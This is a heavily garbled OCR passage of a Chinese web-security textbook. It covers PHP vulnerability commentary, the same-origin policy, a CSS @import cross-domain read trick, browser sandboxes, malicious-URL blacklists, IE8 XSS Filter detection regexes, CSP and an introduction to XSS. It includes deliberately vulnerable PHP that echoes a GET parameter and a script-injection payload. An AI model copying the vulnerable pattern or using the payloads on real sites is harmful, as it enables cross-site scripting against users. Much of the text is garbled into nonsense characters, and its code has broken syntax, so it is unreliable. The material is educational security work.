勇敢 地 承担 起 了 这 个 责任 《我 相信 这 是 一 个 很 坎坷 的 心路 历程 ) ， 为 
这 场 配 成 无 数 惨案 的 闹剧 画 上 了 一 个 句号 。 但 是 我 们 仍然 悲观 地 看 
到 ，cgi.fix_pathinfo 的 问题 仍然 没有 修改 默认 配置 ， 使 用 fastcgi 的 PHP 
应 用 上 默认 处 于 风险 中 。PHP 害 方 仍然 坚持 认为 这 是 一 个 正 第 的 功能 ， 
谁 叫 小 日 程序 员 不 认真 学 习 官 方 文 件 精神 ! 是 啊 ， 无 数 网 站 付出 惨痛 
学 费 的 正常 功能 |! 

PHP 是 当下 用 户 最 多 的 Web 开 发 语言 之 一 ， 但 是 因为 种 种 历史 遗留 原 
(我 认为 是 历史 原因 ) ， 导 致 在 安全 的 “增值 > 服务 上 做 得 远 远 不 够 
(相对 于 一 些 新 兴 的 流行 语言 来 说 。 在 PHP 流 行 起 来 的 时 候 ， 当 时 
的 互联 网 远 远 没有 现在 复杂 ， 也 远 远 没有 现在 这 么 多 的 安全 问题 ,在 
当时 的 历史 背景 下 ， 很 多 问题 都 不 是 “漏洞 ”， 只 是 功能 。 


我 们 可 以 预见 到 ， 在 未 来 互联 网 发 展 的 过 程 中 ， 也 必然 会 有 更 多 、 更 
也 必然 会 让 更 多 的 原本 是 “功能 ”的 东西 ， 变 成 
VR) ? 

最 后 ， 也 许 你 已 经 看 出 来 了 ， 我 并 不 是 要 说 服 谁 is_a0 是 一 个 漏洞 ， 而 
是 在 思考 ， 谁 该 为 这 些 损 失 买 单 ? 我 们 未 来 遇 到 同样 的 问题 怎么 办 ? 
对 于 白 帆 子 来 说 ， 我 们 习惯 于 分 解 问题 ， 同 一 个 问题 ， 我 们 可 以 在 不 
同 层面 解决 ， 可 以 通过 良好 的 代码 规范 去 保证 (事实 上 ， 所 有 的 安全 
问题 都 能 这 么 修复 ， 只 是 需要 付出 的 成 本 过 于 巨大 ) ， 但 只 有 PHP 在 
源头 修补 了 这 个 问题 ， 才 真正 是 善 莫大 看 。 

BTW: is a0 函数 的 问题 已 经 申报 了 人 CVE ， 如 果 不 出 意外 ， 
J 所 以 它 已 经 是 一 个 既成 事实 的 漏 
im] 
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近年 来 随 着 互联 网 的 发 展 ， 人 们 发 现 浏 览 占 才 是 互联 网 最 大 的 入 口 ， 
绝 大 多 数 用 户 使 用 互联 网 的 工具 是 浏览 龙 。 因 此 浏览 硕 市 场 的 竞争 也 
日 趋 日 热 化 。 浏 贤 占 安全 在 这 种 激烈 芜 争 的 环境 中 被 越 来 越 多 的 人 所 
重视 。 一 方面 ， 浏 览 右 天 生 束 是 一 个 客户 端 ， 如 采 具 备 了 安全 功能 ， 
忠 可 以 像 安 全 软件 一 样 对 用 户 上 网 起 到 很 好 的 保护 作用 ; 男 一 方面 ， 
Dl tier OM oer) aA PA SRR, Dae) 商 和 希望 
HEUS EDA cS ET BOAR Tih, DUK EBA ^ AUT POR GE a DU 
览 套 版 本 的 不 断 更 新 ， 浏 览 硕 安全 功能 变 得 越 来 越 强 大 。 在 本 章 中 ， 
我 们 将 介绍 一 些 主要 的 浏览 器 安全 功能 。 


24 同 源 策略 


[el JRE (Same Origin Policy) 是 一 种 约定 ， 它 是 浏览 右 最 核心 也 最 
基本 的 安全 功能 ， 如 果 缺 少 了 同 源 策略 ， 则 浏览 器 的 正常 功能 可 能 都 


2 
会 受到 影响 。 可 以 说 Web 是 构建 在 同 源 策略 的 基础 之 上 的 ， 浏 览 右 只 是 
ETAT Ta VRB WY PSOE © 
对 于 客户 端 Web 安 全 的 学 习 与 研究 来 说 ， 深 入 理解 同 源 策略 是 非常 重要 
的 ， 也 是 后 续 学 习 的 基础 。 很 多 时 候 浏 览 絮 实现 的 同 源 集 上 略 是 隐 性 、 
有 透明 的 ， 很 多 因为 同 源 集 上 略 导 任 的 问题 并 没有 明显 的 出 错 提 示 ， 如 果 
不 吻 悉 同 源 策 略 ， 则 可 能 一 直 都 会 想 不 明 白 问题 的 原因 。 
浏 宽 絮 的 同 源 策 略 ， 限 制 了 来 自 不 同 源 的 “docu-ment”* 或 脚本 ， 对 当 
前 “document” 读 取 或 设置 菜 些 属性 。 
这 一 策略 极其 重要 ， 试 想 如 果 没 有 同 源 策 略 ， 可 能 a.com 的 一 段 
JavaScript 脚 本 ， 在 b.com 未 曾 加 载 此 脚本 时 ， 也 可 以 随意 涂改 b.com 的 
页 面 (在 浏览 器 的 显示 中 ) 。 为 了 不 让 浏览 絮 的 页 面 行 为 发 生 混 乱 ， 
c s [f “Origin” (JH) 这 一 概念 ， 来 和 目 不 同 Origin 的 对 象 无 法 互 
HTH ° 


对 于 JavaScript 来 说 ， 以 下 情况 被 认 为 是 同 产 与 不 同 源 的 。 
URL Outcome Reason 
http://store.company.com/dir2/other.html Success 


http: //store. company. com/dir/inner/another html Success 


https: //store. company. com/secure. html Failure Different protocol 
http://store.company.com:81/dir/etc.html Failure Different port 
http://news.company.com/dir/other.html Failure Different host 


浏览 器 中 JavaScript 的 同 源 策略 ( 当 JavaScript 被 浏览 器 认为 来 自 不 同 源 
时 ， 请 求 被 拒绝 ) 

ALAA, PIU NAA: host (域名 或 1P 地 址 ， 如 果 是 IP 
地 址 则 看 做 一 个 根 域名 ) 、 子 域名 、 端 口 、 协 议 。 


需要 注意 的 是 ， 对 于 当前 页 面 来 说 ， 页 面 内 存放 JavaScript 文 件 的 域 并 
不 重要 ， 重 要 的 是 加 载 JavaScript 页 面 所 在 的 域 是 什么 。 


换言之 ，a.com 通 过 以 下 代码 : 

加 载 了 b.com 上 的 b.js， 但 是 b.js 是 运行 在 a.com 页 面 中 的 ， 因 此 对 于 当前 
打开 的 页 面 (a.com 页面 ) in, b.js AY Origin it IZ 1% Æ a.com Mi JË 
b.com ° 

在 浏览 器 中 ，<script>、<img>、 em <link> 等 标签 都 可 以 足 域 加 
载 资源 ， 而 不 受 同 源 策 上 略 的 限制 。 这 些 带 “sre* 属 性 的 标签 每 次 加 载 
时 , 实际 上 是 由 浏览 器 发 起 了 一 次 GET 请求 。 TES EÉXMI HupRequest 
Wae, io src PEU SERÉS Grm, Weasel] I JavaScriptHJTXPR, TU 
不 能 读 、 写 返回 的 内 容 。 

a ee 它 可 以 访问 来 自 同 源 对 象 的 内 容 。 比 如 下 
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«html» 

«head» 

«script type-"text/javascript"» 
var xmlhttp; 

function loadXMLDoc(url) 


{ 

xmlhttp=null; 

if (window. XMLHttpRequest ) 
{// code for Firefox, Opera, IE7, etc. 
xmlhttp=new XMLHttpRequest(); 


} 

else if (window. pee ce 
{// code for IE6, 

xmlhttp=new 1 'Microsoft.XMLHTTP"); 


if (xmlhttp!-null) 


xmlhttp.onreadystatechange-state Change; 
xmlhttp.open("GET",url,true); 
xmlhttp.send(null); 


else 


alert("Your browser does not support XMLHTTP."); 
} 


function state Change() 


if (omnee; readyState==4) 
(// 4 = "loaded" 
if (xmlhttp. status==200) 
{// 200 = "Ok" 
document. SetElenenteyrdl， T1').innerHTML-xmlht 
tp.responseTex 


else 


alert("Problem retrieving data:" + 
xmlhttp.statusText); 
3 


} 


</script> 

</head> 

<body onload="loadXMLDoc( '/example/xdom/ 
test xmlhttp.txt')"» 

«div id-"T1" style-"border:ipx solid 
black;height:40;width:300;padding:5"»«/ 
div»«br /» 

«button onclick="loadXMLDoc('/example/xdom/ 
test xmlhttp2.txt')"»Click«/button» 
</body> 

</html> 


但 XMLHttpRequest 受 到 同 源 策略 的 约束 ， 不 能 跨 域 访问 资源 ， 在 AJAX 
应 用 的 开发 中 尤其 需要 注意 这 一 点 。 

如 果 XMLHttpRequest 能 够 跨 域 访问 资源 ， 则 可 能 会 导致 一 些 敏 感 数据 
泄露 ， 比 如 CSREF 的 to-ken， 从 而 导致 发 生 安全 问题 。 

但 是 互联 网 是 开放 的 ， 随 着 业务 的 发 展 ， 跨 域 请 求 的 需求 越 来 越 迫 
切 ， 因 此 W3C 委 员 会 制定 了 XMLHttpRequest 跨 域 访 问 标 准 。 它 需要 通 
过 目标 域 返回 的 HITP 头 来 授权 是 否 允 许 跨 域 访问 ， 因 为 HITP 头 对 于 
JavaScript 来 说 一 般 是 无 法 控制 的 ， 所 以 认为 这 个 方案 可 以 实施 。 注 
意 : 这 个 跨 域 访问 方案 的 安全 基础 就 是 信任 “JavaScript 无 法 控制 该 
HTTP 头 ”， 如 果 此 信任 基础 被 打破 ， 则 此 方案 也 将 不 再 安全 。 


WWW. a. COM www. b. com 


test. html test. php 


hccess-Control-Allow-Ürigin 


跨 域 访问 请 求 过 程 

具体 的 实现 过 程 ， 在 本 书 的 “HTML 5 安全 ”一 章 中 会 继续 探讨 。 

HTA aar, BR I DOM ` Cookie ` XMLHttpRequest Z P| FYER 
略 的 限制 外 ， 浏 览 器 加 载 的 一 些 第 三 方 插件 也 有 各 目的 同 源 策 略 。 最 
利 见 的 一 些 插件 如 Flash、Java Applet ^ Sil-verlight ^ Google Gears 等 都 
有 目 己 的 控制 策略 。 

以 Flash 为 例 ， 它 主要 通过 目标 网 站 提供 的 crossdomain.xml 文 件 判 断 是 
否 人 允许 当前 “ 源 ” 的 Flash 跨 域 访问 目标 资源 。 

以 www.qq.com 的 策略 文件 为 例 ， 当 浏览 器 在 任意 其 他 域 的 页 面 里 加 载 
了 Flash 后 ， 如 果 对 www.gq.com 发 起 访问 请 求 ，Flash 会 先 检查 
www.qq.com 上 此 策略 文件 是 否 存在 。 如 果 文 件 存 在 ， 则 检查 发 起 请 求 
的 域 是 否 在 许可 范围 内 。 


vvv. qq, co 


own ac from domaine” e. qq. coa" 
allow-accesz-frca domain^" e, gt ing. com” 


www.qq.comfÉJcrossdomain.xml Y. fF 

TEXCUCT ANS Cbr, HOUSE B.qq.com 和 和 .gtimg.com 域 的 请 求 是 被 允许 
的 。 依 靠 这 种 方式 ， 从 Origin 的 层面 上 控制 了 Flash 行 为 的 安全 性 。 

在 Flash 9 及 其 之 后 的 版 本 中 ， 还 实现 了 MIME 检 查 以 确认 


crossdomain.xml 是 否 合 法 ， 比 如 查看 服务 器 返回 HTTP 头 的 Content-Type 


EZ 
AEH 
</body> 
www.b.com/test2.html 
<style> 
@import url("http://www.a.com/test.html"); 
y 


«scri pt» 
setTimeout(function()( 
var t = 


= 
TEwww.b.com/test2.html F 38 3:3 @import JEX f http://www.a.com/test.html 
Aj CSS X ft, iH We Xt X S Bj Um DOM ， 同 时 通过 docu- 
ment.body.currentStyle.fontFamily 37; [A] th N 2X » [a] el Az ^E YE IE BJ CSS 
Parse 的 过 程 中 ， 下 将 font-Family 后 面 的 内 容 当 做 了 value， 从 而 可 以 读 
取 www.a.com/test.html 的 页 面 内 容 。 


p /fv b ound tenet + Pelernel Eepler er 


在 www.b.com 下 读 取 到 了 www.a.com 的 页 面 内 容 

我 们 前 面 提 到 ， 比如 <script> 等 标签 仅 能 加 载 换 产 ， 但 不 能 读 、 写 资源 
的 内 容 ， 而 这 个 漏洞 能 够 跨 域 读 取 页 面 内 容 ， 因 此 绕 过 了 同 源 荣 上 略 ， 
成 为 一 个 跨 域 漏洞 。 

DI, s BI FT UR SC zs DI V, i EN as f 在 本 书后 续 章 节 中 提 到 的 许 
多 客户 端 脚本 攻击 ， 都 需要 遵守 这 一 法 则 ， 因 此 理解 同 源 策略 对 于 客 
户 端 脚本 攻击 有 着 重要 意义 。 同 源 策 略 一 旦 出 现 漏洞 被 绕 过 ， 也 将 带 
e 很 多 基于 同 源 策略 制定 的 安全 方案 都 将 失去 效 


2.2 ”浏览 器 沙 箱 
针对 客户 端的 攻击 近年 来 呈现 爆发 趋势 : 


2009 年 全 年 挂 马 网 站 状况 趋势 图 
挂 30000 
马 25000 
网 20000 
站 15000 | 
数 10000 


ge 2 Quo ur 


JU V ooo Sg 


2009 年 全 年 挂 马 网 站 状况 趋势 图 

这 种 在 网 页 中 插入 一 段 恶 意 代 码 ， 利 用 浏览 器 漏洞 执 行 任意 代码 的 攻 
证 方式 ， 在 黑客 圈子 里 被 形象 地 称 为 挂 马 ”。“ 挂 马 ” 是 浏览 器 需要 面 对 
的 一 个 主要 威胁 。 近 年 来 ， 独 立 于 杀毒 软件 之 外 ， 浏 响 器 厂商 根据 挂 
马 的 特点 研究 出 了 一 些 对 抗 挂 马 的 技术 。 

比如 在 Windows 系 统 中 ， 浏 贤 器 密切 结合 DEP、ASLR、SafeSEH 等 操 
作 系 统 提 供 的 保护 技术 ， 对 抗 内 存 攻击 。 与 此 同时 ， 浏览 絮 还 发 展 出 
了 多 进程 架构 ， 从 安全 性 上 有 了 很 大 的 提高 

A be PES FERM, EAM DL aR AS TORE, £e X a SE 
例 分 开 ， 当 一 个 进程 崩溃 时 ， 也 不 会 影响 到 其 他 的 进程 。 

Google Chrome 是 第 一 1 RME ERRARE BRAT Las ° Google Chrome 的 主 
要 进程 分 为 : 浏览 器 进程 、 演 染 进程 、 揪 件 进程 、 扩 展 进 程 。 揪 件 进 
程 如 flash、java、pdf 等 与 浏览 如 进 程 严格 隅 离 ， 因 此 不 会 互相 影响 o 


y CM 


OS-level sandbox 


OS/runrime exploit barriers 


OS/runtime exploit barriers 


browser kernel web content 


(trusted) < (untrusted) 


browser kernel process rendering engine process 
Google Chrome 的 染 构 
演 染 引擎 由 Sandbox 隅 离 ， 了 网 页 代码 要 与 浏览 右 内 核 进程 通信 、 与 操作 
系统 通信 都 需要 通过 IPCchannel， 在 其 中 会 进行 一 些 安全 检查 。 
Sandbox 即 沙 箱 ， 计 算 机 技术 发 展 到 今天 ，Sandbox 已 经 成 为 泛 指 “资源 
隔离 类 模块 ”的 代名词 。Sandbox 的 设计 目的 一 般 是 为 了 让 不 可 信任 的 
代码 运行 在 一 定 的 环境 中 ， 限 制 不 可 信任 的 代码 访问 隔离 区 之 外 的 资 
源 。 如 宁 一 定 要 跨越 Sandbox 边 界 产 生 数 据 交 换 ， 则 只 能 通过 指定 的 数 
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合法 性 。 
Sandbox 的 应 用 范围 非常 广泛 。 比 如 一 个 提供 hosting 服 务 的 共享 主机 环 
境 ， 假 设 支 持 用 户 上 传 PHP、Python、Java 等 语言 的 代码 ， 为 了 防止 用 
户 代码 破坏 系统 环境 ， 或 者 是 不 同 用 户 之 间 的 代码 互相 影响 ， 则 应 该 
设计 一 个 Sandbox 对 用 户 代码 进行 隔离 。Sandbox 需 要 考虑 用 户 代码 针 
对 本 地 文件 系统 、 内 存 、 数 据 库 、 网 络 的 可 能 请 求 ， 可 以 采用 默认 拒 
绝 的 策略 ， 对 于 有 需要 的 请 求 ， 则 可 以 通过 封装 API 的 方式 实现 。 
而 对 于 浏览 如 来 说 ， 采 用 Sandbox 技 术 ， 无 疑 可 以 让 不 受信 任 的 网 页 代 
码 、JavaScript 代 码 运行 在 一 个 受到 限制 的 环境 中 ， 从 而 保护 本 地 桌面 
系统 的 安全 。 
Google Chrome 实 现 了 一 个 相对 完整 的 Sand-box: 
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Manager 


Policy Engine 
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Google Chrome 的 Sandbox 架 构 
8 也 采取 了 多 进程 架构 ， 每 一 个 Tab 页 即 是 一 个 进程 ， 如 下 是 下 8 的 架 


IE 8 的 架构 


多 进程 架构 最 明显 的 一 个 好 处 是 ， 相 对 于 单 进程 浏览 器 ， 在 发 生前 证 
时 ， 多 进程 浏览 器 只 会 月 省 当前 的 Tab 页 ， 而 单 进程 浏览 器 则 会 盎 溃 整 


个 浏览 絮 进 程 。 这 对 于 用 户 体 验 是 很 大 的 提升 。 

但 是 浏览 器 安全 是 一 个 整体 ， 在 现今 的 浏览 器 中 ， 虽然 有 多 进程 架构 
和 Sandbox 的 保护 ， 但 是 浏览 右 所 加 载 的 一 些 第 三 方 插件 却 往往 不 受 
Sand-box 管 辖 。 比 如 近年 来 在 Pwn2Own 大 会 上 被 攻克 的 浏览 器 ， 往 往 
都 是 由 于 加 载 的 第 三 方 插件 出 现 安 全 漏洞 导致 的 。Flash、Java、 
PDF ` .Net Frame-work 在 近年 来 都 成 为 浏 贤 器 攻击 的 热点 。 

也 许 在 不 远 的 未 来 ， 在 浏览 器 的 安全 模型 中 会 更 加 重视 这 些 第 三 方 插 
件 ， 不 同 广 商 之 间 会 就 安全 达成 一 致 的 标准 ， 也 只 有 这 样 ， 才 能 将 这 
个 互联 网 的 入 口 打造 得 更 加 牢固 。 


2.3 ”恶意 网 址 拦截 

上 市 提 到 了 “ 挂 马 ”攻击 方式 能 够 破坏 浏览 器 安全 ， 在 很 多 时 候 ,“ 挂 
马 ” 攻 击 在 实施 时 会 在 一 个 正常 的 网 页 中 通过 <scripf> 或 者 <iframe> 等 标 
签 加 载 一 个 恶意 网 址 。 而 除了 挂 马 所 加 载 的 恶意 网 址 之 外 ， 钓 鱼网 
站 、 诈 骗 网 站 对 于 用 户 来 说 也 是 一 种 恶意 网 址 。 为 了 保护 用 户 安全 ， 
浏览 器 厂商 纷纷 推出 了 各 自 的 拦截 恶意 网 址 功能 。 目 前 各 个 浏览 器 的 
拦截 恶意 网 址 的 功能 都 是 基于 “ 黑 名 单 * 的 。 

恶意 网 址 拦截 的 工作 原理 很 简单 ， 一 般 都 是 浏览 器 周期 性 地 从 服务 器 
端 获取 一 份 最 新 的 恶意 网 址 墨 名单， 如 果 用 户 上 网 时 访问 的 网 址 存在 
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Google Chrome 的 恶意 网 址 拦截 警告 


常见 的 恶意 网 址 分 为 两 类 : 一 类 是 挂 马 网 站 ， 这 些 网 站 通 溃 包含 有 恶 
意 的 脚本 如 JavaScript 或 Flash， 通过 利用 浏览 器 的 漏洞 (包括 一 些 
件 、 控 件 漏洞 ) 执行 shellcode， 在 用 户 电 脑 中 植 入 木马 ， 另 一 类 是 钓 
网 站 ， 通 过 模仿 知名 网 站 的 相似 页 面 来 欺骗 用 户 。 

要 识别 这 两 种 网 站 ， 需要 建立 许多 基于 页 面 特征 的 模型 ， 而 这 些 模型 
显然 是 是 不 适合 放 在 客户 端的 ， 因 为 这 会 让 攻击 者 得 以 分 析 、 人 研究 并 绕 


过 这 些 规则 。 同 时 对 于 用 户 基 数 巨 大 的 浏 咒 右 来 说 ， 收 集 用 户 访 问 过 
的 历史 记录 也 是 一 种 侵犯 隐私 的 行为 ， 且 数据 量 过 于 庞大 。 
基于 这 两 个 原因 ， 浏 蜗 器 厂商 目前 只 是 以 推送 恶意 网 址 黑 名 单 为 主 ， 
Vi V, ACE A ea, ON ALP SRI RETI ek, RD Be 
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的 安全 广 商 展 开 合作 ， 由 安全 广 商 或 机 构 提供 恶意 网 址 黑 名 单 。 

一 些 有 实力 的 浏览 器 厂商 ， 比 如 Google 和 微软 ， 由 于 本 身 技术 研发 实 
力 较 强 ， 且 又 掌握 了 大 量 的 用 户 数据 ， 因 此 上 自 建 有 安全 团队 做 恶意 网 
址 识别 工作 ， 用 以 提供 浏览 器 所 使 用 的 黑 名 和 蛙 。 对 于 搜索 引 敬 来 说 ， 
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单 由 世界 各 地 的 志愿 者 提供 ， 且 更 新 频繁 。 


PhishTank 


Add A Phish Verify A Phish Phish Search Stats FAQ Developers Mailing Lists My Account 


Join the fight against phishing 


Submit suspected phishes. Track the status of your submissions. 
Verify other users submissions, Develop software with our free API. 


Found a phishing site? Get started now — see if it's in the Tank: 


Recent Submissions 

You can help! Sign in or register (free! fast!) to verify these suspected phishes, 

ID URL Submitted by 
1257366  http;//woman.ca/plugins/user/www itau.com.br-GRIPN... jtaarcia 
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PhishTank 的 恶意 网 址 列表 

类 似 地 ，Google 也 公开 了 其 内 部 使 用 的 SafeBrowsing API， 任 何 组 织 或 
个 人 都 可 以 在 产品 中 接 入 ， 以 获取 Google 的 恶意 网 址 库 。 

除了 恶意 网 址 黑 名 单 拦截 功能 外 ， 主 流 浏 览 器 都 开始 支持 EV SSL 证 书 
(Extended ValidationSSL Certificate) ， 以 增强 对 安全 网 站 的 识别 。 
EVSSL 证 书 是 全 球 数字 证 书 颁 发 机 构 与 浏览 器 | 商 一 起 打造 的 增强 型 
证 书 ， 其 主要 特色 是 浏览 器 会 给 予 EVSSL 证 书 特殊 待遇 。EVSSL 证 书 
也 遵循 X509 标 准 ， 并 向 前 兼容 普通 证 书 。 如 果 浏 览 器 不 支持 EV 模式 ， 


则 会 把 该 证 书 当做 普通 证 书 ， 如 果 浏 览 器 支持 (需要 较 新 版 本 的 浏览 
器 ) EV 模式 ， 则 会 在 地 址 栏 中 特别 标注 。 


Get the green address bar. 


Go- 


在 正中 : EV 证 书 在 正中 的 效果 
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a Your connection to this web site is encrypted to prevent 
eavesdropping. 


" More Information... 


在 Firefox 中 : EV 证 书 在 Firefox 中 的 效果 
而 普通 的 https 证 书 则 没有 绿色 的 RE AtEm: 
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普通 证 书 在 正中 的 效果 


因此 网 站 在 使 用 了 EV SSL 证 书后 ， 可 以 教育 用 户 识别 真实 网 站 在 浏览 
me HN AO 表现 ， 以 对 抗 钓鱼 网 站 o 


SignUp | Loo | Heb | Sec 
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使 用 EV 证 书 的 网 站 在 正中 的 效果 

昌 然 很 多 用 户 对 浏览 和 右 的 此 项 功能 并 不 束 悉 ，EVSSL 证 书 的 效果 并 非 

rd 但 随 着 时 间 的 推移 ， 有 望 让 EVSSL 证 书 的 认证 功能 逐渐 深入 
[^ o 


2.4 高 速 发 展 的 浏览 器 安全 

“浏览 器 安全 ”领域 涵盖 的 范围 非常 大 ， 上 且 今 天 浏览 器 仍然 在 不 断 更 
新 ， 不 断 推出 新 的 安全 功能 。 

为 了 在 安全 领域 获得 竞争 力 ， 微 软 率 先 在 下 8 中 推出 了 XSS Filter 功 
能 ， 用 以 对 抗 反射 型 XSS。 一 直 以 来 ，XSS ( 跨 站 脚本 攻击 ) 都 被 认为 
是 服务 器 端 应 用 的 漏洞 ， 应 该 由 服务 器 端 应 用 在 代码 中 修补 ， 而 微软 
率先 推出 了 这 一 功能 ， 就 使 得 IE 8 在 安全 领域 极 具 特色 。 

当 用 户 访问 的 URL 中 包含 了 XSS 攻 击 的 脚本 时 ，IE 就 会 修改 其 中 的 关键 
字符 使 得 攻击 无 法 成 功 完成 ， 并 对 用 户 弹 出 提示 框 。 


» EB LA P - J 
| XSS Hello World - Windows Internet Explorer. 


We Ej XSS Hello World 


88-8 


V) Internet Explorer modified this page to prevent a potential cross-site scripting attack. Click here for more information... 


Hello, alert("bang! script 
injection n" -document.cookie); 
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@ Internet | Protected Mode: On 


IE 8 拦截 了 XSS 攻 击 
E 8 的 可 执行 文件 ， 得 到 下 面 这 些 
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{<BA{S}E[ /*Nt].*?href[ /+\t]*=} 
{<LI{N}K[ /+\t].*?href[ /+\t]*=} 
{<ME{T}A[ /*Nt].*?http-equiv[ /+\t]*=} 
{<\?im{p}sort[ /+\t].*?implementation[ /+ 
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这 些 规 则 可 以 捕获 URL 中 的 XSS 攻 击 ， 其 他 的 安全 产品 可 以 借鉴 。 

而 Firefox 也 不 甘 其 后 ， 在 Firefox 4 中 推出 了 Content Security Policy 
(CSP) 。 这 一 策略 是 由 安全 专家 Robert Hanson 最 早 提 出 的 ， 其 做 法 

BA pee pete ROREM 并 在 其 中 描述 页 面 应 该 遵守 的 安全 策 

由 于 XSS 攻 击 在 没有 第 三 方 插件 帮助 的 情况 下 ， 无 法 控制 HTTP 头 ， 所 

以 这 项 措施 是 可 行 的。 

而 这 种 自 定 义 的 语法 必须 由 浏览 器 支持 并 实现 ，Firefox 是 第 一 个 支持 

此 标准 的 浏 贤 器 。 

使 用 CSP 的 方法 如 下 ， 插 入 一 个 HTTP 返 回 尖 : 


X-Content-Security-Policy: policy 


其 中 policy 的 摘 述 极其 灵活 ， 比 如 ; 


X-Content-Security-Policy: allow 'self' 
* .mydomain.com 


vu bias be fa FE2K E] mydomain.com kf ER RASA ° 
X: 


A bias be SER BARU, BAT ER AL ^ RA 
medial.com 的 媒体 文件 ， 以 及 userscripts.example.com 的 脚本 ， 其 他 的 
则 一 律 拒绝 。 

CSP 的 设计 理念 无 疑 是 出 色 的 ， 但 是 CSP 的 规则 配置 较为 复杂 ， 在 页 面 
较 多 的 情况 下 ， 很 难 一 个 个 配置 起 来 ， 且 后 期 维护 成 本 也 非常 巨大 ， 
这 些 原因 导致 CSP 未 能 得 到 很 好 的 推广 。 

除了 这 些 新 的 安全 功能 外 ， 浏 宽 器 的 用 户 体验 也 越 来 越 好 ， 随 之 而 来 
的 是 许多 标准 定义 之 外 的 “友好 ”功能 ， 但 很 多 程序 员 并 不 知道 这 些 新 
功能 ， 从 而 可 能 导致 一 些 安全 隐患 。 

比如 ， 浏 览 器 地 址 栏 对 于 畸形 URL 的 处 理 就 各 自 不 同 。 在 下 中， 如 下 
URL 将 被 正常 解析 : 


会 变 为 


具有 同样 行为 的 还 有 Chrome， 将 只 " 变 为 标准 的 “/”。 

但 是 Firefox 却 不 如 此 解析 ，www.google.com\abc 将 被 认为 是 非法 的 地 
址 ， 无 法 打开 。 

同样 “友好 ”的 功能 还 有 ，Eirefox、 正 、Chrome 都 会 认识 如 下 的 URL: 


www.google.com?abc 


www. google.com/?abc 


Firefox 比 较 有 意思 ， 还 能 认识 如 下 的 URL: 
[http://www.cnn.com] 
[http://]www.cnn.com 
[http://www].cnn.com 


这 些 功能 虽然 很 “友好 ”， 但 是 如 果 被 墨客 所 利用 ， 可 能 会 用 于 绕 过 一 
些 安 全 软件 或 者 安全 模块 ， 反 而 不 美 了 。 

浏览 右 加 载 的 插件 也 是 浏览 絮 安 全 需要 考虑 的 一 个 问题 。 近 年 来 浏览 
器 所 重点 打造 的 一 大 特色 ， 就 是 丰富 的 扩展 与 插件 。 

扩展 和 插件 极 大 地 丰富 了 浏览 器 的 功能 ， 但 安全 问题 也 随 之 而 来 ， 除 
了 插件 可 能 存在 漏洞 外 ， 插 件 本 身 也 可 能 会 有 恶意 行为 。 扩 展 和 插件 
BY DUR eB rei FOU JavaScripts AXIR, 比如 可 以 进行 一 些 跨 域 网 络 请 求 


在 插件 中 ， 也 曾经 出 现 过 一 些 具有 恶意 功能 的 程序 ， 比 如 代号 为 
Trojan.PWS.ChromeInject.A 的 恶意 插件 ， 其 目标 是 窃取 网 银 密码 。 它 有 
两 个 文件 : 


"%ProgramFiles%\Mozilla Firefox\plugins 
Nnpbasic.dll" 

"%ProgramFiles%\Mozilla Firefox\chrome\chrome 
\content\browser.js" 


ERES TE PIU Firefoxi WB ii, "ARA EUH EDT AER, MWER 
po OR 并 发 送 到 远程 服务 器 。 痢 的 功能 ， 也 给 我 们 带 来 了 新 
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浏览 右 是 互联 网 的 重要 入 口 ， 在 安全 攻防 中 ， 浏 览 右 的 作用 也 越 来 越 
被 人 们 所 重视 。 在 以 往 研 究 攻 防 时 ， 大 家 更 重视 的 是 服务 器 端 漏洞 ; 
而 在 现在 ， 安 全 研究 的 范围 已 经 涵盖 了 所 有 用 户 使 用 互联 网 的 方式 ， 
浏 宽 絮 正 是 其 中 最 为 重要 的 一 个 部 分 。 

浏览 絮 的 安全 以 同 源 策略 为 基础 ， 加 深 理 解 同 源 策 略 ， 才 能 把 握 住 浏 
览 器 安全 的 本 质 。 在 当前 浏 虎 器 高 速 发 展 的 形势 下 ， 恶 意 网 址 检测 > 
揪 件 安全 等 问题 都 会 显得 越 来 越 重 要 。 紧 跟 浏 览 右 发 展 的 脚步 来 研究 
浏览 器 安全 ， 是 安全 研究 者 需要 认真 对 待 的 事情 。 


7833€ 跨 站 脚本 攻击 (XSS) 


跨 站 脚本 攻击 (XSS) 是 客户 端 脚本 安全 中 的 头号 大 敌 。OWASP TOP 
10 威 胁 多 次 把 XSS 列 在 榜首 。 本 革 将 深入 探讨 XSS 攻 击 的 原理 ， 以 及 
如 何 正确 地 防御 它 。 


3.1 XSS 简 介 

跨 站 脚本 攻击 ， 英 文 全 称 是 Cross Site Script， 本 来 缩写 是 CSS， 但 是 为 
Ty AUR SEC (Cas-cading Style Sheet, CSS) 有 所 区 别 ， 所 以 在 安 
全 领域 叫做 “XSS”。 

XSS 攻 击 ， 通 常 指 黑客 通过 “HTML 注 入 ”党 改 了 网 页 ， $8 T RRR 
本 ， 从 而 在 用 户 浏览 网 页 时 ， 控 制 用 户 浏 览 絮 的 一 种 攻击 。 在 一 开 
始 ， 这 种 攻击 的 演示 案例 是 路 域 的 ， 所 以 叫做 * 跨 站 脚本 ”。 但 是 发 展 
到 今天 ， 由 于 JavaScript 的 强大 功能 以 及 网 站 前 端 应 用 的 复杂 化 ， 是 否 
。 但 是 由 于 历史 原因 ，XSS 这 个 名 字 却 一 直 保 留 下 
XSS 长 期 以 来 被 列 为 客户 端 Web 安 全 中 的 头号 大 敌 。 因 为 XSS 破 坏 力 强 
大 ， 且 产生 的 场景 复 洒 ， 难 以 一 次 性 解决 。 现 在 业内 达成 的 共识 是 : 
针对 各 种 不 同 场景 产生 的 XSS， 需 要 区 分 情景 对 待 。 即 便 如 此 ， 复 杂 的 
应 用 环境 仍然 是 XSS 涕 生 的 温床 。 

那么 ,什么 是 XSS 呢 ?看 看 下 面 的 例子 。 

假设 一 个 页 面 把 用 户 输入 的 参数 直接 输出 到 页 面 上 : 


<?php 
$input = $ GET["param"]; 
echo "<div>".$input."</div>"; 


TEIETÉ TH UU P. HP Iparamtéac Haga ea Bl OUP, Pease: 


http://www.a.com/test.php?param= 这 是 一 个 测试 


会 得 到 如 下 结果: 


Google Mia Qoos | | | http://… 是 一 个 测试 ! 9| 


这 是 一 个 测试 ! 
正常 的 用 户 请 求 
此 时 查看 页 面 源 代码 ， 可 以 看 到 |: 


<div> 这 是 一 个 测试 1</div> 


但 是 如 果 提 交 一 段 HIML 代 码 : 


http://www.a.com/test.php? 
aram=<script>alert(/xss/)</script> 


会 发 现 ，alert(/xss/) 在 当前 页 面 执行 了 : 


包含 了 XSS 攻 击 的 用 户 请 求 结果 
再 查看 源 代码 : 


